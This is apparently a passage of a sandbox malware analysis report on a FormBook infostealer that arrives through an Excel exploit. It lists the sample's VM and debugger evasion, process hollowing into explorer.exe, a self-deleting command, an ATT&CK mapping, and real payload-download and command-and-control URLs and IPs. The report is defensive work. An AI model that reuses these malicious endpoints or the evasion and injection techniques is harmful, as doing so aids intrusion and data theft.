Source: explorer.exe, 00000006.00000000.2148813341.00000000041DB000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: VMwareHDDm
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000006.00000002.2346924278.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: vmware8

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088A0 rdtsc

5_2_004088A0

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00409B10 LdrLoadDll,

5_2_00409B10

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A126F8 mov eax, dword ptr fs:[00000030h]		5_2_00A126F8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028F26F8 mov eax, dword ptr fs:[00000030h]		7_2_028F26F8

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 74.208.236.61 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 102.141.201.70 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 184.168.131.241 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 67.195.197.25 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 209.126.13.151 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.235.143.6 80	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread register set: target process: 1388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: F00000

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: vbc.exe, 00000005.00000002.2171454972.00000000029A0000.00000040.00000001.sdmp	Binary or memory string: Proxy DesktopProgmanSoftware\Microsoft\Windows\CurrentVersion\RunOnce
Source: explorer.exe, 00000006.00000000.2135630370.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2171454972.00000000029A0000.00000040.00000001.sdmp, explorer.exe, 00000006.00000000.2135630370.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.2346897540.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.2135630370.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Windows Service1	Windows Service1	Masquerading111	Input Capture1	Security Software Discovery321	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Process Injection612	Virtualization/Sandbox Evasion3	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer15	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools11	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol23	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information41	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing13	DCSync	System Information Discovery113	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
EME_PO.47563.xlsx	38%	ReversingLabs	Document-Word.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	25%	ReversingLabs	Win32.Trojan.Wacatac
C:\Users\Public\vbc.exe	25%	ReversingLabs	Win32.Trojan.Wacatac

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.vbc.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
cna-notary.com	0%	Virustotal		Browse
www.8no3.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://192.227.129.22/vbc.exe	100%	Avira URL Cloud	malware
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.bestpodstudio.com/mz59/?rFN0=Xrx4qn&u2M0SF6h=z/+6kJk1ZiQzz1nPj4QpXoSyzw+77qJSyU9yqVlYEeNMvKLM5SL/kyHjrXfbl0j4G8KzAg==	0%	Avira URL Cloud	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.hostingbisniz.com/mz59/?rFN0=Xrx4qn&u2M0SF6h=OW9WwwQcQ8ztOX5YgXZ2qNcRwznn7rmsJyX42Vrsm3RiMqRsS0WcEJSAu/B+R53MEk5Vww==	0%	Avira URL Cloud	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://www.pellatrap.net/mz59/?u2M0SF6h=DyvGskzBclCbgEHOjTp+IehUzdGnZKMlyQnRi93amGKEFkS3cbEvMjPLMaYESsyOmM8Qkw==&rFN0=Xrx4qn	0%	Avira URL Cloud	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://www.tennessyherb.com/mz59/?u2M0SF6h=DnU1EkBat3Hivgbf1+4PHnhz+o7EzLkrjQo0TNQNOtieRb0aWO5zv8QtAyN+qW28k6DlMA==&rFN0=Xrx4qn	0%	Avira URL Cloud	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/	0%	Avira URL Cloud	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
propage.beatstars.com	52.206.159.80	true	false		high
www.pellatrap.net	74.208.236.61	true	true		unknown
cna-notary.com	184.168.131.241	true	true	0%, Virustotal, Browse	unknown
www.8no3.com	156.235.143.6	true	true	0%, Virustotal, Browse	unknown
hostingbisniz.com	209.126.13.151	true	true		unknown
sbsfe-p11r.geo.mf0.yahoodns.net	67.195.197.25	true	true		unknown
shops.myshopify.com	23.227.38.74	true	true		unknown
xjcg168.com	102.141.201.70	true	true		unknown
www.xjcg168.com	unknown	unknown	true		unknown
www.thejakx.com	unknown	unknown	true		unknown
www.bestpodstudio.com	unknown	unknown	true		unknown
www.cna-notary.com	unknown	unknown	true		unknown
www.macijanie.com	unknown	unknown	true		unknown
www.vandelayind.net	unknown	unknown	true		unknown
www.hostingbisniz.com	unknown	unknown	true		unknown
www.tennessyherb.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://192.227.129.22/vbc.exe	true	Avira URL Cloud: malware	unknown
http://www.bestpodstudio.com/mz59/?rFN0=Xrx4qn&u2M0SF6h=z/+6kJk1ZiQzz1nPj4QpXoSyzw+77qJSyU9yqVlYEeNMvKLM5SL/kyHjrXfbl0j4G8KzAg==	true	Avira URL Cloud: safe	unknown
http://www.hostingbisniz.com/mz59/?rFN0=Xrx4qn&u2M0SF6h=OW9WwwQcQ8ztOX5YgXZ2qNcRwznn7rmsJyX42Vrsm3RiMqRsS0WcEJSAu/B+R53MEk5Vww==	true	Avira URL Cloud: safe	unknown
http://www.pellatrap.net/mz59/?u2M0SF6h=DyvGskzBclCbgEHOjTp+IehUzdGnZKMlyQnRi93amGKEFkS3cbEvMjPLMaYESsyOmM8Qkw==&rFN0=Xrx4qn	true	Avira URL Cloud: safe	unknown
http://www.tennessyherb.com/mz59/?u2M0SF6h=DnU1EkBat3Hivgbf1+4PHnhz+o7EzLkrjQo0TNQNOtieRb0aWO5zv8QtAyN+qW28k6DlMA==&rFN0=Xrx4qn	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.iis.fhg.de/audioPA	explorer.exe, 00000006.00000000.2149115180.0000000004B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sogou.com/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://%s.com	explorer.exe, 00000006.00000000.2160171245.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000004.00000002.2132538973.0000000002421000.00000004.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.windows.com/pctv.	explorer.exe, 00000006.00000000.2140876935.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://coinmarketcap.com/api/	vbc.exe, vbc.exe, 00000005.00000002.2171190369.0000000000F92000.00000020.00020000.sdmp	false		high
http://www.abril.com.br/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.naver.com/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.t-online.de/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000006.00000000.2154967477.000000000856E000.00000004.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
